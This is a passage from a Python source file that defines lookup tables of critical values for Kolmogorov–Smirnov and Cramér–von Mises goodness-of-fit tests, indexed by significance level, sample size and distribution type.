0.07374329417580833, 'beta1': 0.10551157755974006, 'beta2': 0.13294004606451998, 'beta4': 0.08265330043672003}, 75: {'uni': 0.11993235153506276, 'nor': 0.08480408445268339, 'beta1': 0.12138149971982604, 'beta2': 0.14821067875308103, 'beta4': 0.09487982606384139}, 50: {'uni': 0.1450901598179003, 'nor': 0.10314539464936745, 'beta1': 0.14745197306443125, 'beta2': 0.17411692213927954, 'beta4': 0.11517539906859259}, 30: {'uni': 0.18368281401813502, 'nor': 0.1321090658183411, 'beta1': 0.1875463935108379, 'beta2': 
0.21006490447672693, 'beta4': 0.14663588943386274}, 20: {'uni': 0.2196807646682773, 'nor': 0.15994694395320508, 'beta1': 0.22522106948161613, 'beta2': 0.24235899456781695, 'beta4': 0.17573119318593766}, 10: {'uni': 0.2888943190995493, 'nor': 0.220722689927199, 'beta1': 0.2985481150360235, 'beta2': 0.3045137581383749, 'beta4': 0.236985210651535}}, 0.25: {1000: {'uni': 0.032062416809360894, 'nor': 0.0227866671462571, 'beta1': 0.03208834216728629, 'beta2': 0.05337049741834132, 'beta4': 0.025475357813055488}, 750: {'uni': 0.03701423511603763, 'nor': 0.026225229844276166, 'beta1': 0.03703256957864909, 'beta2': 0.057813715669675636, 'beta4': 0.02936248102422831}, 500: {'uni': 0.045227717679089396, 'nor': 0.0320485047106529, 'beta1': 0.04519714698473515, 'beta2': 0.06831356769816821, 'beta4': 0.03593644546272762}, 400: {'uni': 0.050450659079979754, 'nor': 0.03581784094010593, 'beta1': 0.05056637414823473, 'beta2': 0.0729182038087659, 'beta4': 0.04001889562676658}, 300: {'uni': 0.058161445018157565, 'nor': 0.041252983698886025, 'beta1': 0.058325688269647125, 'beta2': 0.08170482185096284, 'beta4': 0.04612705504436812}, 200: {'uni': 0.07094962986364317, 'nor': 0.05046048885276999, 'beta1': 0.0712213019748647, 'beta2': 0.09581725770034533, 'beta4': 0.0563670463913345}, 150: {'uni': 0.0815744257595088, 'nor': 0.058060489761412676, 'beta1': 0.08204932927986253, 'beta2': 0.1075479659950831, 'beta4': 0.06500871809976655}, 100: {'uni': 0.09912785547497138, 'nor': 0.0707907611619234, 'beta1': 0.10021469580117251, 'beta2': 0.12475954060183503, 'beta4': 0.0790298213954928}, 75: {'uni': 0.11388087855996165, 'nor': 0.08144708523365077, 'beta1': 0.1151935997969889, 'beta2': 0.13944968782072553, 'beta4': 0.09073471227314939}, 50: {'uni': 0.13765260055314554, 'nor': 0.0991006689972383, 'beta1': 0.13998309637363815, 'beta2': 0.16393144318454161, 'beta4': 0.11023561371839477}, 30: {'uni': 0.1741856459150477, 'nor': 0.1269186751139828, 'beta1': 0.1778768200120303, 'beta2': 
0.19832202672268084, 'beta4': 0.14017916545551046}, 20: {'uni': 0.20839509742333207, 'nor': 0.1535088033354377, 'beta1': 0.21387705197529588, 'beta2': 0.22870691603776427, 'beta4': 0.16824942099586182}, 10: {'uni': 0.2740727774470333, 'nor': 0.21222634033868049, 'beta1': 0.2828793884551896, 'beta2': 0.288383430493807, 'beta4': 0.22670497011739216}}, 0.3: {1000: {'uni': 0.03057612825774314, 'nor': 0.02199386622109878, 'beta1': 0.03061262686465055, 'beta2': 0.049703953698298386, 'beta4': 0.02447722233427918}, 750: {'uni': 0.03533838333580652, 'nor': 0.02530417208682001, 'beta1': 0.03537355380273649, 'beta2': 0.05399871759330599, 'beta4': 0.02823270309239162}, 500: {'uni': 0.043123689527982734, 'nor': 0.030927801548839978, 'beta1': 0.043123330457107534, 'beta2': 0.06396221956203696, 'beta4': 0.034528974097892545}, 400: {'uni': 0.04814799667805744, 'nor': 0.03456908247933843, 'beta1': 0.04823146494173067, 'beta2': 0.06837351075097187, 'beta4': 0.038486897300680556}, 300: {'uni': 0.05550906419590629, 'nor': 0.03978480548326124, 'beta1': 0.05571141547789926, 'beta2': 0.07663630270628857, 'beta4': 0.04434408116637903}, 200: {'uni': 0.06762156145960091, 'nor': 0.048648082377034274, 'beta1': 0.06798995743435188, 'beta2': 0.0901597857532756, 'beta4': 0.05417087708582158}, 150: {'uni': 0.0777889938150631, 'nor': 0.055992681950055134, 'beta1': 0.078310929702266, 'beta2': 0.10131183123822018, 'beta4': 0.062417414108562386}, 100: {'uni': 0.09459233371131393, 'nor': 0.06828184758918193, 'beta1': 0.09551945542738993, 'beta2': 0.1178069154885687, 'beta4': 0.07593328084768572}, 75: {'uni': 0.10866796055687228, 'nor': 0.07853952378167028, 'beta1': 0.10982303249195069, 'beta2': 0.13190968528845182, 'beta4': 0.08730445455818964}, 50: {'uni': 0.13131745651785992, 'nor': 0.09562198442675823, 'beta1': 0.1335175652395422, 'beta2': 0.15495495520954616, 'beta4': 0.10586806539719948}, 30: {'uni': 0.16622024765958232, 'nor': 0.1224700829191776, 'beta1': 0.16965623137726848, 'beta2': 
0.18803738711333812, 'beta4': 0.13470969723802004}, 20: {'uni': 0.19877030362889103, 'nor': 0.14799815211895767, 'beta1': 0.20344160260647876, 'beta2': 0.21717215473139662, 'beta4': 0.161706399244382}, 10: {'uni': 0.26145583014921425, 'nor': 0.2046385546777918, 'beta1': 0.2695783330780789, 'beta2': 0.2744402713994778, 'beta4': 0.21759542548906985}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' and the single # distributions in the initial CM-tests self.crit_val_ini_cm = {0.05: {1000: {'uni': 0.4594653273130281, 'nor': 0.12548409215203657, 'beta1': 0.4601325244776592, 'beta2': 2.6054538536684997, 'beta4': 0.19475509620124962}, 750: {'uni': 0.45799049980605744, 'nor': 0.12602524417442473, 'beta1': 0.46004206806029374, 'beta2': 2.1329896811378033, 'beta4': 0.19489847773362395}, 500: {'uni': 0.45925627371563715, 'nor': 0.12628494613337185, 'beta1': 0.46043257598514326, 'beta2': 1.8976333035266344, 'beta4': 0.19472713920556675}, 400: {'uni': 0.4550317088764882, 'nor': 0.12598689815558065, 'beta1': 0.4616845122929176, 'beta2': 1.67081859009825, 'beta4': 0.19310625273502202}, 300: {'uni': 0.4526386955716205, 'nor': 0.1258215616832631, 'beta1': 0.4621300837641701, 'beta2': 1.5237466437923628, 'beta4': 0.19308530495744508}, 200: {'uni': 0.4518991017642939, 'nor': 0.12579322471148224, 'beta1': 0.45814779697632135, 'beta2': 1.3141217632115256, 'beta4': 0.1907182023495619}, 150: {'uni': 0.4435801756869992, 'nor': 0.1261943477466138, 'beta1': 0.4603257655776193, 'beta2': 1.197499866156661, 'beta4': 0.19138023143214206}, 100: {'uni': 0.44398214960811005, 'nor': 0.1251049524249278, 'beta1': 0.45613701682564656, 'beta2': 1.0199854820373724, 'beta4': 0.1912520049669216}, 75: {'uni': 0.43855945433022814, 'nor': 0.12660427792231924, 'beta1': 0.4534542449640568, 'beta2': 0.9078879160230264, 'beta4': 0.18851203766812671}, 50: {'uni': 0.42185603966628915, 'nor': 0.1251135767029667, 'beta1': 
0.4529463879788932, 'beta2': 0.7785693328825756, 'beta4': 0.18783979338011667}, 30: {'uni': 0.4007242486006498, 'nor': 0.12536020919060598, 'beta1': 0.433955290048165, 'beta2': 0.6300668797650217, 'beta4': 0.18309677695119683}, 20: {'uni': 0.37357963600331506, 'nor': 0.1244502347645548, 'beta1': 0.4098571660526302, 'beta2': 0.52578110215289, 'beta4': 0.17583001005443635}, 10: {'uni': 0.3015175081905277, 'nor': 0.12299654131879613, 'beta1': 0.3385532447833868, 'beta2': 0.35993981010958676, 'beta4': 0.1589058816117949}}, 0.001: {1000: {'uni': 1.161161598361952, 'nor': 0.2558443498119062, 'beta1': 1.1479519803384115, 'beta2': 6.709302131132306, 'beta4': 0.44475223680375087}, 750: {'uni': 1.151578196881537, 'nor': 0.2555050176799102, 'beta1': 1.1555400330755854, 'beta2': 5.432775518995104, 'beta4': 0.4383116823384742}, 500: {'uni': 1.1484428347021816, 'nor': 0.25417015345250027, 'beta1': 1.179178309999159, 'beta2': 4.891239107169016, 'beta4': 0.4389087929008622}, 400: {'uni': 1.1930541236855035, 'nor': 0.2518343883827663, 'beta1': 1.1803881424592395, 'beta2': 4.300235437758729, 'beta4': 0.4386478457920091}, 300: {'uni': 1.1473970431560971, 'nor': 0.25317628629366085, 'beta1': 1.1624327986427483, 'beta2': 3.8989413853739827, 'beta4': 0.44551847042340587}, 200: {'uni': 1.18082412252855, 'nor': 0.25899079782112855, 'beta1': 1.2025828386510071, 'beta2': 3.391511017366001, 'beta4': 0.4405063674404278}, 150: {'uni': 1.1387187678474655, 'nor': 0.25321382063754555, 'beta1': 1.1466986042414955, 'beta2': 2.970375106650482, 'beta4': 0.4398607423338549}, 100: {'uni': 1.1146160300547057, 'nor': 0.2591267084483367, 'beta1': 1.123764591588948, 'beta2': 2.557181557186044, 'beta4': 0.4349804526379736}, 75: {'uni': 1.1036094150895535, 'nor': 0.25037527962652184, 'beta1': 1.1576098464988671, 'beta2': 2.255565186689404, 'beta4': 0.4283114412555718}, 50: {'uni': 1.06359109192906, 'nor': 0.2593884319637725, 'beta1': 1.1172655406958785, 'beta2': 1.9088453990800698, 'beta4': 
0.4147307819414802}, 30: {'uni': 0.9806221663466906, 'nor': 0.24979623637195073, 'beta1': 1.0995943461327278, 'beta2': 1.5374147736094401, 'beta4': 0.40449471961197647}, 20: {'uni': 0.9183844094874211, 'nor': 0.2410666264484626, 'beta1': 1.0121027232912676, 'beta2': 1.2429536313291623, 'beta4': 0.3910244272778875}, 10: {'uni': 0.705105426746303, 'nor': 0.2356691665356145, 'beta1': 0.7805556315358917, 'beta2': 0.8041905799529989, 'beta4': 0.3422805857620354}}, 0.005: {1000: {'uni': 0.8650500727527625, 'nor': 0.20355208320636353, 'beta1': 0.8609196227705078, 'beta2': 5.144036940610599, 'beta4': 0.3365600054421361}, 750: {'uni': 0.8626986115937819, 'nor': 0.1982484245115105, 'beta1': 0.8768929537385406, 'beta2': 4.121713329611062, 'beta4': 0.340394884525468}, 500: {'uni': 0.8463252948272091, 'nor': 0.204047905448246, 'beta1': 0.8643194167991456, 'beta2': 3.7142396090256673, 'beta4': 0.338149801728149}, 400: {'uni': 0.8759613393266179, 'nor': 0.20113796554865335, 'beta1': 0.8720674011608025, 'beta2': 3.234826377969159, 'beta4': 0.33251013574505706}, 300: {'uni': 0.8467830546773162, 'nor': 0.19835890349416413, 'beta1': 0.8625806550035283, 'beta2': 2.91747054310664, 'beta4': 0.3337907894045298}, 200: {'uni': 0.8671446864117717, 'nor': 0.19955136121772268, 'beta1': 0.8799640423750006, 'beta2': 2.5611562585381584, 'beta4': 0.33340460979200826}, 150: {'uni': 0.8504532982772084, 'nor': 0.20114192058643274, 'beta1': 0.8585546641050331, 'beta2': 2.2731935785727866, 'beta4': 0.33516132028355133}, 100: {'uni': 0.8262581996585238, 'nor': 0.20172429821482568, 'beta1': 0.8566261612415256, 'beta2': 1.9386478314789783, 'beta4': 0.33057577054096593}, 75: {'uni': 0.8231601092929631, 'nor': 0.19954548808488737, 'beta1': 0.8507692286383358, 'beta2': 1.7184750351160816, 'beta4': 0.3281716117279958}, 50: {'uni': 0.791311042044641, 'nor': 0.20201644061099297, 'beta1': 0.8253344560388312, 'beta2': 1.471598126502107, 'beta4': 0.3142747378332868}, 30: {'uni': 0.7454004085339159, 'nor': 
0.19868948854462629, 'beta1': 0.8117279190997636, 'beta2': 1.163572754042539, 'beta4': 0.3134379622253203}, 20: {'uni': 0.6927111395174737, 'nor': 0.19799803099243843, 'beta1': 0.7690007170290268, 'beta2': 0.9674971023639148, 'beta4': 0.29755522914247085}, 10: {'uni': 0.5404922820663465, 'nor': 0.1897950283341688, 'beta1': 0.6048954133188673, 'beta2': 0.6396273271986439, 'beta4': 0.2661737354047272}}, 0.01: {1000: {'uni': 0.7366305701442963, 'nor': 0.18079399258995782, 'beta1': 0.7409500769469214, 'beta2': 4.379123588591741, 'beta4': 0.2924280426122813}, 750: {'uni': 0.7442238251513217, 'nor': 0.17730654116361785, 'beta1': 0.7432715265134635, 'beta2': 3.520644408051276, 'beta4': 0.2948533948139171}, 500: {'uni': 0.7295640623706077, 'nor': 0.18058378329387692, 'beta1': 0.7432308493338711, 'beta2': 3.1831218453213364, 'beta4': 0.29273348151982065}, 400: {'uni': 0.74825746560008, 'nor': 0.17857559572928583, 'beta1': 0.7513046011459512, 'beta2': 2.7813333770088593, 'beta4': 0.2920493370610846}, 300: {'uni': 0.7346085309181084, 'nor': 0.17814686297600194, 'beta1': 0.7384559054473249, 'beta2': 2.5293538764033396, 'beta4': 0.2930624211260037}, 200: {'uni': 0.7291492259573107, 'nor': 0.1770738854920472, 'beta1': 0.7468672378966367, 'beta2': 2.198188994091246, 'beta4': 0.2919775882512319}, 150: {'uni': 0.7235173729542574, 'nor': 0.17865467815894331, 'beta1': 0.7334497638668434, 'beta2': 1.9672046766786264, 'beta4': 0.2923645746551409}, 100: {'uni': 0.7062948565843012, 'nor': 0.17810159631256017, 'beta1': 0.7375298250695946, 'beta2': 1.6478430914391802, 'beta4': 0.2864079167189714}, 75: {'uni': 0.7048541225084534, 'nor': 0.1782357072385056, 'beta1': 0.7291152927800391, 'beta2': 1.4723510105994482, 'beta4': 0.28510459988581655}, 50: {'uni': 0.6822877555314413, 'nor': 0.17832163110271299, 'beta1': 0.7058926323102283, 'beta2': 1.2628603110009782, 'beta4': 0.2762680230658396}, 30: {'uni': 0.6438645415806148, 'nor': 0.17641294567529855, 'beta1': 0.6988358937799531, 'beta2': 
1.00261546291451, 'beta4': 0.2728708936653677}, 20: {'uni': 0.5979389276979273, 'nor': 0.17733658586090492, 'beta1': 0.6634216883500963, 'beta2': 0.8401862828094895, 'beta4': 0.2581148398098823}, 10: {'uni': 0.47439214163279075, 'nor': 0.17006126698160068, 'beta1': 0.5291255307312486, 'beta2': 0.5561342600451974, 'beta4': 0.23396694517733096}}, 0.1: {1000: {'uni': 0.34460694172229767, 'nor': 0.10360382794686329, 'beta1': 0.34720511538309606, 'beta2': 1.8875836943154027, 'beta4': 0.15367514351394482}, 750: {'uni': 0.3451867692665267, 'nor': 0.10315529568661869, 'beta1': 0.3483346351805406, 'beta2': 1.5286450857480112, 'beta4': 0.1542030881869177}, 500: {'uni': 0.34164207323070384, 'nor': 0.10394394883772727, 'beta1': 0.34942375915790075, 'beta2': 1.3882095566154824, 'beta4': 0.15391095453357267}, 400: {'uni': 0.34651892768462955, 'nor': 0.1036273981872271, 'beta1': 0.3462081705189476, 'beta2': 1.2069446519288858, 'beta4': 0.1544497253882817}, 300: {'uni': 0.3428635737550537, 'nor': 0.1038942851019886, 'beta1': 0.3476223025035556, 'beta2': 1.1098635931611327, 'beta4': 0.15444570971940158}, 200: {'uni': 0.34041089582801143, 'nor': 0.10389233254481366, 'beta1': 0.34763445978967616, 'beta2': 0.9680266999416997, 'beta4': 0.15250676214014847}, 150: {'uni': 0.3377302693762681, 'nor': 0.10346526116949699, 'beta1': 0.34489227504038494, 'beta2': 0.8728702651269197, 'beta4': 0.1522928420716538}, 100: {'uni': 0.33355369989756883, 'nor': 0.10342904850983256, 'beta1': 0.3427607367426677, 'beta2': 0.7468081520100366, 'beta4': 0.151846388902334}, 75: {'uni': 0.3279519851250598, 'nor': 0.1033051672049144, 'beta1': 0.34059079399004955, 'beta2': 0.6701570036198051, 'beta4': 0.1507237727552958}, 50: {'uni': 0.320726154832351, 'nor': 0.10326137162907119, 'beta1': 0.33950765789386894, 'beta2': 0.5746838732278858, 'beta4': 0.1476312595625842}, 30: {'uni': 0.3048544686945858, 'nor': 0.1032506284925571, 'beta1': 0.3272112572888899, 'beta2': 0.4681866459910121, 'beta4': 0.14446811972146092}, 
20: {'uni': 0.2846944243235544, 'nor': 0.1028801774665988, 'beta1': 0.31098139768353583, 'beta2': 0.39502874401480026, 'beta4': 0.14018723197105618}, 10: {'uni': 0.23151476199873214, 'nor': 0.10222753291379459, 'beta1': 0.2591691265371872, 'beta2': 0.27317146177593893, 'beta4': 0.12824901267237765}}, 0.2: {1000: {'uni': 0.23891699447877507, 'nor': 0.08094731846506226, 'beta1': 0.24094997843944543, 'beta2': 1.1721114900242817, 'beta4': 0.11543501824848225}, 750: {'uni': 0.2404933108907096, 'nor': 0.08091514974400534, 'beta1': 0.24060333173620502, 'beta2': 0.9693351882078056, 'beta4': 0.11578575775778918}, 500: {'uni': 0.23767299214394635, 'nor': 0.08143013376811509, 'beta1': 0.24272727287877066, 'beta2': 0.8833066278909469, 'beta4': 0.11540869401380342}, 400: {'uni': 0.2389502568536976, 'nor': 0.08131132500068124, 'beta1': 0.23929939472873027, 'beta2': 0.7740123343256322, 'beta4': 0.11612370917705966}, 300: {'uni': 0.23767421960657104, 'nor': 0.08137026978935988, 'beta1': 0.2413717405506026, 'beta2': 0.7075931771768734, 'beta4': 0.11572673022823697}, 200: {'uni': 0.2375380459668403, 'nor': 0.08138169789779784, 'beta1': 0.24093637511896582, 'beta2': 0.6212880525665451, 'beta4': 0.11464757578960799}, 150: {'uni': 0.2346674147394386, 'nor': 0.08111648704644667, 'beta1': 0.23871828329053957, 'beta2': 0.5639043523411755, 'beta4': 0.1144192658708614}, 100: {'uni': 0.23144277683193992, 'nor': 0.08086088008195286, 'beta1': 0.23765747593958084, 'beta2': 0.4871104294369415, 'beta4': 0.11369840709232508}, 75: {'uni': 0.22903357158577958, 'nor': 0.08107942066962537, 'beta1': 0.23687860277184203, 'beta2': 0.4387740764573971, 'beta4': 0.1133033325819042}, 50: {'uni': 0.22282964313663456, 'nor': 0.08128764938651908, 'beta1': 0.23467305038546576, 'beta2': 0.38174763155086583, 'beta4': 0.1112554646459918}, 30: {'uni': 0.21121535286091023, 'nor': 0.08154061002867806, 'beta1': 0.22669185244123524, 'beta2': 0.3149719244556432, 'beta4': 0.1087977058346659}, 20: {'uni': 
0.19948749085011552, 'nor': 0.08117232367036036, 'beta1': 0.21669660949781708, 'beta2': 0.2693729942635194, 'beta4': 0.10597716119365037}, 10: {'uni': 0.16430469528177583, 'nor': 0.08150777731263585, 'beta1': 0.18122070967231182, 'beta2': 0.19059913324778516, 'beta4': 0.09776227574034621}}, 0.25: {1000: {'uni': 0.2073622245210208, 'nor': 0.07380009436406758, 'beta1': 0.20904068646385907, 'beta2': 0.9597148435930869, 'beta4': 0.10361053731297827}, 750: {'uni': 0.20830280107305865, 'nor': 0.07380726982919651, 'beta1': 0.2085995996243024, 'beta2': 0.7986091394776444, 'beta4': 0.10386137028660365}, 500: {'uni': 0.2063708005028261, 'nor': 0.07418743470211109, 'beta1': 0.21009413000274246, 'beta2': 0.7233087867046614, 'beta4': 0.103532945392617}, 400: {'uni': 0.20810791282236252, 'nor': 0.07407319000419614, 'beta1': 0.20749468421255743, 'beta2': 0.639061150743961, 'beta4': 0.1039097259786984}, 300: {'uni': 0.2069617339473839, 'nor': 0.07417041380366121, 'beta1': 0.20881311523590293, 'beta2': 0.5873404580341767, 'beta4': 0.10365164703335579}, 200: {'uni': 0.20633618881322238, 'nor': 0.07431380328185423, 'beta1': 0.2096349293319493, 'beta2': 0.5182222647556451, 'beta4': 0.10246873175611658}, 150: {'uni': 0.20397320572124797, 'nor': 0.07400405520839556, 'beta1': 0.20711157206009445, 'beta2': 0.47119547735400447, 'beta4': 0.10276373650008787}, 100: {'uni': 0.20130936260465182, 'nor': 0.07387183501067715, 'beta1': 0.20687465898503946, 'beta2': 0.40718701425151566, 'beta4': 0.10182092379405154}, 75: {'uni': 0.19852776314003645, 'nor': 0.07393158430130788, 'beta1': 0.20550667909573891, 'beta2': 0.3693192980610446, 'beta4': 0.10150395150740255}, 50: {'uni': 0.19388474978484183, 'nor': 0.07420083364025896, 'beta1': 0.20350014172907788, 'beta2': 0.32356832480704306, 'beta4': 0.0999746406180958}, 30: {'uni': 0.18355727709549313, 'nor': 0.07451794632809351, 'beta1': 0.19616222630838362, 'beta2': 0.26786333649854016, 'beta4': 0.0976861971100757}, 20: {'uni': 0.17328456961586736, 
'nor': 0.07429319062250538, 'beta1': 0.18715487185431445, 'beta2': 0.23051142471255764, 'beta4': 0.09527608612752941}, 10: {'uni': 0.1439420051439661, 'nor': 0.07448506284496655, 'beta1': 0.15783717122161106, 'beta2': 0.165322481393709, 'beta4': 0.0881875611186847}}, 0.3: {1000: {'uni': 0.18266493036122441, 'nor': 0.06787398648836995, 'beta1': 0.18413714303934486, 'beta2': 0.7939484739262997, 'beta4': 0.09424089113895272}, 750: {'uni': 0.1834933385424178, 'nor': 0.06774823495176488, 'beta1': 0.18328690579924797, 'beta2': 0.6657885178958219, 'beta4': 0.09411764242286233}, 500: {'uni': 0.18210747710096634, 'nor': 0.0682050076857646, 'beta1': 0.18545982860570304, 'beta2': 0.6035300802969183, 'beta4': 0.09382274022146861}, 400: {'uni': 0.18303077478939317, 'nor': 0.06803420606952354, 'beta1': 0.1832023300936057, 'beta2': 0.5348503605172882, 'beta4': 0.09439504810213005}, 300: {'uni': 0.18177746911539827, 'nor': 0.06818473058282226, 'beta1': 0.18428212132088345, 'beta2': 0.4902376235565143, 'beta4': 0.09403788951347426}, 200: {'uni': 0.1816800164976337, 'nor': 0.06833889279734263, 'beta1': 0.18433678860840758, 'beta2': 0.4357735417384846, 'beta4': 0.0930165257817752}, 150: {'uni': 0.17998814397403265, 'nor': 0.06806323128922373, 'beta1': 0.18235304873781227, 'beta2': 0.3987631304299662, 'beta4': 0.09300297461109802}, 100: {'uni': 0.17734862196792756, 'nor': 0.06787056258025743, 'beta1': 0.18232920738794536, 'beta2': 0.34628591421707594, 'beta4': 0.09251758018601589}, 75: {'uni': 0.17501811415904828, 'nor': 0.06794778939736534, 'beta1': 0.1811216846739435, 'beta2': 0.31515956986054794, 'beta4': 0.09227802527028829}, 50: {'uni': 0.17127286320423607, 'nor': 0.06825835640417134, 'beta1': 0.1783095339004599, 'beta2': 0.2773715225887576, 'beta4': 0.09083180121082819}, 30: {'uni': 0.16210318531956106, 'nor': 0.06864306659301066, 'beta1': 0.17243143687559875, 'beta2': 0.23158692745518694, 'beta4': 0.08861156990151152}, 20: {'uni': 0.15293857531053232, 'nor': 
0.06842370561655187, 'beta1': 0.1646586342377624, 'beta2': 0.20028710138975353, 'beta4': 0.08663292264169759}, 10: {'uni': 0.12764289106639928, 'nor': 0.06890998128086945, 'beta1': 0.13899778934023796, 'beta2': 0.1452153818161471, 'beta4': 0.08038247939430213}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_ks-tests in the update steps self.crit_val_upd_ks = {0.001: {1000: {1000: {'uni': 0.06194167830060293, 'nor': 0.07822872053106872, 'beta1': 0.060972223483102383, 'beta2': 0.1259312803264634, 'beta4': 0.053644805280471275}, 750: {'uni': 0.07013498250410122, 'nor': 0.0846176702668644, 'beta1': 0.07382074910040726, 'beta2': 0.12721212549622074, 'beta4': 0.06265031431957047}, 500: {'uni': 0.08868191404192605, 'nor': 0.10172187597321586, 'beta1': 0.08635714610250639, 'beta2': 0.1354501683123147, 'beta4': 0.07939958283221715}, 400: {'uni': 0.09466328320945472, 'nor': 0.10653424583665405, 'beta1': 0.09812143640789389, 'beta2': 0.14231851569369025, 'beta4': 0.09001786186298039}, 300: {'uni': 0.112900393327934, 'nor': 0.11948590318054664, 'beta1': 0.1128099223418304, 'beta2': 0.15412182838111443, 'beta4': 0.10688640573728891}, 200: {'uni': 0.13999451914937044, 'nor': 0.14525209648524945, 'beta1': 0.1363146522235133, 'beta2': 0.17279316051643773, 'beta4': 0.13132853027863567}, 150: {'uni': 0.15825801427544206, 'nor': 0.16624699603775567, 'beta1': 0.15782699160464128, 'beta2': 0.19586569775328777, 'beta4': 0.15093718225825237}, 100: {'uni': 0.19109919414724275, 'nor': 0.19819275001361214, 'beta1': 0.19211678955447464, 'beta2': 0.21880574483038184, 'beta4': 0.18949005031175215}, 75: {'uni': 0.2198169498248439, 'nor': 0.22313893040183352, 'beta1': 0.22260086497739834, 'beta2': 0.24861080819897047, 'beta4': 0.21646042451513092}, 50: {'uni': 0.27110531940815974, 'nor': 
0.26870229964436126, 'beta1': 0.27154448822648203, 'beta2': 0.2925856220451067, 'beta4': 0.2690827053650406}, 30: {'uni': 0.341159036875694, 'nor': 0.34417584958804415, 'beta1': 0.34742946906497024, 'beta2': 0.35887753792308147, 'beta4': 0.34251314662315646}, 20: {'uni': 0.4247074513367157, 'nor': 0.4257230167126152, 'beta1': 0.4147166360680411, 'beta2': 0.42712883590666906, 'beta4': 0.4243734735369824}, 10: {'uni': 0.5883376017796452, 'nor': 0.5763352676031682, 'beta1': 0.5744260319735885, 'beta2': 0.5823827801917355, 'beta4': 0.5678433762722503}}, 750: {1000: {'uni': 0.0611759570618689, 'nor': 0.08090222271917469, 'beta1': 0.06269089313861997, 'beta2': 0.12229377182596635, 'beta4': 0.05189322774912314}, 750: {'uni': 0.06999691237536224, 'nor': 0.08755856539246498, 'beta1': 0.07015966614757518, 'beta2': 0.12824148557035264, 'beta4': 0.06188500275856437}, 500: {'uni': 0.08538842360253246, 'nor': 0.10140984451333485, 'beta1': 0.08689642339864323, 'beta2': 0.1347503234468263, 'beta4': 0.07734069816818492}, 400: {'uni': 0.09683865057491581, 'nor': 0.11198143598374655, 'beta1': 0.0966354900118695, 'beta2': 0.14394540297183944, 'beta4': 0.08763861812335089}, 300: {'uni': 0.11157253985246895, 'nor': 0.12602422854188344, 'beta1': 0.11244663757346751, 'beta2': 0.1554651616593184, 'beta4': 0.10415578668422443}, 200: {'uni': 0.13654464830576057, 'nor': 0.15133013476858165, 'beta1': 0.13839044278268253, 'beta2': 0.16561454357136107, 'beta4': 0.13143244333617032}, 150: {'uni': 0.15622840528205983, 'nor': 0.16817043946341126, 'beta1': 0.15548905512988154, 'beta2': 0.18938825998267717, 'beta4': 0.14980964956382015}, 100: {'uni': 0.19579707682616415, 'nor': 0.19493448629254073, 'beta1': 0.1907364681295448, 'beta2': 0.21379910922104456, 'beta4': 0.18921973720089247}, 75: {'uni': 0.2217040971984533, 'nor': 0.22676199918015594, 'beta1': 0.22281270555321675, 'beta2': 0.24553068147624701, 'beta4': 0.2185653911488343}, 50: {'uni': 0.28058489484935584, 'nor': 0.2726192686778714, 
'beta1': 0.27549434346061347, 'beta2': 0.2963953500479535, 'beta4': 0.2613706221802624}, 30: {'uni': 0.3542190682518411, 'nor': 0.3609105538670239, 'beta1': 0.346103596210534, 'beta2': 0.37037725489911305, 'beta4': 0.34271197416665083}, 20: {'uni': 0.4192705279674709, 'nor': 0.4227233474310455, 'beta1': 0.41559337298012755, 'beta2': 0.4320244942862363, 'beta4': 0.417645435565697}, 10: {'uni': 0.581210346357099, 'nor': 0.5914300273318283, 'beta1': 0.5798222632426484, 'beta2': 0.576140120904139, 'beta4': 0.5755991159580565}}, 500: {1000: {'uni': 0.06036407215881656, 'nor': 0.09090115403529747, 'beta1': 0.06255930197979287, 'beta2': 0.13359354983685368, 'beta4': 0.05069644528510775}, 750: {'uni': 0.07028443525653139, 'nor': 0.09555844399847702, 'beta1': 0.07153464071873405, 'beta2': 0.139381271869496, 'beta4': 0.060482876205486535}, 500: {'uni': 0.08736257185674318, 'nor': 0.10986008971817585, 'beta1': 0.08806460210132372, 'beta2': 0.14662206874056294, 'beta4': 0.07355203635067697}, 400: {'uni': 0.09738153077428247, 'nor': 0.11929320722653125, 'beta1': 0.09822023903171845, 'beta2': 0.1554507716764446, 'beta4': 0.0856711290635534}, 300: {'uni': 0.1142826184827973, 'nor': 0.13333306355949393, 'beta1': 0.11167159945610117, 'beta2': 0.16891471559153437, 'beta4': 0.10481821179485074}, 200: {'uni': 0.13674660783901085, 'nor': 0.1510767540153743, 'beta1': 0.13945129736328155, 'beta2': 0.1856231161919606, 'beta4': 0.1275501476407893}, 150: {'uni': 0.15662754110107693, 'nor': 0.17132793534131086, 'beta1': 0.1584778040085073, 'beta2': 0.20319728743391985, 'beta4': 0.14506897344382674}, 100: {'uni': 0.19187926872498368, 'nor': 0.20409409384231936, 'beta1': 0.18927583777700208, 'beta2': 0.23363291179999657, 'beta4': 0.18630089408915784}, 75: {'uni': 0.2198773014226113, 'nor': 0.22969594012702854, 'beta1': 0.22501859827640036, 'beta2': 0.2537264924207476, 'beta4': 0.22025245598758353}, 50: {'uni': 0.26703941343557996, 'nor': 0.2709855298709943, 'beta1': 0.26520771720638253, 
'beta2': 0.30140881449323687, 'beta4': 0.2690849811291071}, 30: {'uni': 0.34535681060535584, 'nor': 0.3531786350766798, 'beta1': 0.34464606252236557, 'beta2': 0.3579140519043085, 'beta4': 0.34385764547646414}, 20: {'uni': 0.41654437214179635, 'nor': 0.4238773679688896, 'beta1': 0.4156688979762777, 'beta2': 0.4342947530823177, 'beta4': 0.41234511208135727}, 10: {'uni': 0.5927880081321425, 'nor': 0.571169284617098, 'beta1': 0.5890376211941302, 'beta2': 0.5799218969338741, 'beta4': 0.5772716599910823}}, 400: {1000: {'uni': 0.061610633047749275, 'nor': 0.09387417997070269, 'beta1': 0.060006123541623435, 'beta2': 0.13359508313715762, 'beta4': 0.050499024612637056}, 750: {'uni': 0.0725990060934733, 'nor': 0.09999368681512216, 'beta1': 0.0714711957562868, 'beta2': 0.1396657769543962, 'beta4': 0.05786321789604981}, 500: {'uni': 0.08793932634136903, 'nor': 0.1132890416520379, 'beta1': 0.08764486030536317, 'beta2': 0.1506116538331888, 'beta4': 0.07384003832444169}, 400: {'uni': 0.09509051332670226, 'nor': 0.12086275924386036, 'beta1': 0.09874882902727133, 'beta2': 0.15349299194370858, 'beta4': 0.0849049812616951}, 300: {'uni': 0.11300077096060224, 'nor': 0.13104186476027302, 'beta1': 0.11236264122161288, 'beta2': 0.16671246834931386, 'beta4': 0.10114052127037293}, 200: 